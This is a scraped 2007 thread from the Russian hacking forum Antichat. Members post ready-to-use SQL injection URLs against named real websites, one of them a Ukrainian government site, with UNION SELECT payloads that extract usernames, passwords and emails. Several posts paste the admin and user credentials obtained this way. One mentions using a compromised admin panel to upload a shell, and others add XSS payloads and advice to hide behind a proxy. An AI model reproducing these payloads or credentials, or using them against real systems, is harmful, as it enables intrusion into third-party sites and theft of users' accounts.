Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
27.03.2007, 17:08
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Как мне нравится когда удаётся всю инфу достать (версия мускула там 4):
Код:
http://www.numizmatik.ru/news/read.php?news=-1+union+select+1,2,3,concat(fio,char(58),userlogin,char(58),userpassword,char(58),email),5,6,7,8+from+user/*
P.S. скуля траф жрёт - т.к. все записи выводит, так что кто за траф платит...
Последний раз редактировалось Grey; 27.03.2007 в 17:23..
|
|
|
27.03.2007, 17:55
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047
Репутация:
930
|
|
www.quadrasoft.com.ua
Код:
http://www.quadrasoft.com.ua/web/news.php?id=-1+union+select+1,2,concat(user(),char(58),version()),4/*
|
|
|
|
27.03.2007, 20:06
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
Код:
http://www.bulfurniture.com/php/news_more.php?id=-52+union+select+1,username,3,4,5,password,7,8+from+user/*
Код:
http://www.horoskopa.com/signs.php?id=-8+union+select+1,convert(version()%20using%20cp1251)/*
lukabloom.com
Код:
http://www.lukabloom.com/shop.php?id=-98%20UNION%20SELECT%201,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14+from+admin/*
user:lukabloom
password:luka_shop27
http://www.lukabloom.com/admin/ (в нашем случае админка
служит для заливки шелла)  |
|
|
|
27.03.2007, 21:46
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Вот эту смотреть только через проксю:
Там много таблиц, есть и с более интересными названиями, но их не могу выкладывать по правилам форума, для примера таблица с юзверями.
Код:
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+48,1/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=char(109,111,115,95,117,115,101,114,115)+limit+0,1/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,concat(id,char(58),name,char(58),username,char(58),email,char(58),password,char(58),usertype),4,5+from+Mambo.mos_users/*
--------------------------------------------------------------------
Код:
http://www.filmec.ru/index.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
Код:
http://www.rmdb.ru/?company&id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
|
|
|
|
27.03.2007, 22:24
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
мб было, но..
Код:
http://www.biosens.ru/index.php?res=folder&rec=-1+union+select+1,concat(login,0x3a,password)+from+users/*
* admin:admin
* news:111
* news2:222
* birth:birth
* Andrei:4444
* Kirimov:kir251
там же пассивная xss
Код:
http://www.biosens.ru/index.php?res=folder&rec=%3Cscript%3Ealert(/xss/)%3C/script%3E
|
|
|
|
27.03.2007, 23:14
|
|
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972
Репутация:
250
|
|
Код:
http://www.voladm.gov.ua/news.php?id=-1804+union+select+1,2,3,4,5,user,7,8,9,10,password,12,13,14+from+mysql.user/*
|
|
|
|
27.03.2007, 23:36
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.tiic.ru/sub_t.php?id_ur=3&id=-1+union+select+1,2,concat(username,char(58),user_password)+from+forum_users/*
P.S. скуля траф жрёт - т.к. все записи выводит, так что кто за траф платит...
P.P.S вторая такая за сегодня) |
|
|
|
28.03.2007, 00:08
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
2 Grey
http://www.tiic.ru/sub_t.php?id_ur=3&id=-1+union+select+1,2,concat(username,char(58),user_p assword)+from+forum_users+ limit+1,1/* |
|
|
|
28.03.2007, 09:55
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Не дадим прожить ДОМу 3 ?
dom3mir.ru
Регистрируемся с любыми данными......
Далее идем изменять свою анкету...
В уязвимые поля: Район, Метро,Город пишем такой код..ну там уж как придумаете вставляете всякие sql запросы....
Далее оставляете сообщение на форуме...нажимаете на свой ник над авой....(смотрите свой профильс другой стороны типа) и вот скуль =)
Примерна такая:
Код:
Error: 1064 .... You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'onmouseover="alert('xss')""' at line 1
|
|
|
|
28.03.2007, 11:05
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
mssql
Код:
http://www.ballroom.ru/new/i.asp?id=6&c=133&o=-1+union+all+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables--
mysql
Код:
http://stroykaveka.ru/catalog.php?enter=firm&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,table_name,16,17,18,19,20,21,22,23,24+from+information_schema.tables+limit+58,1/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
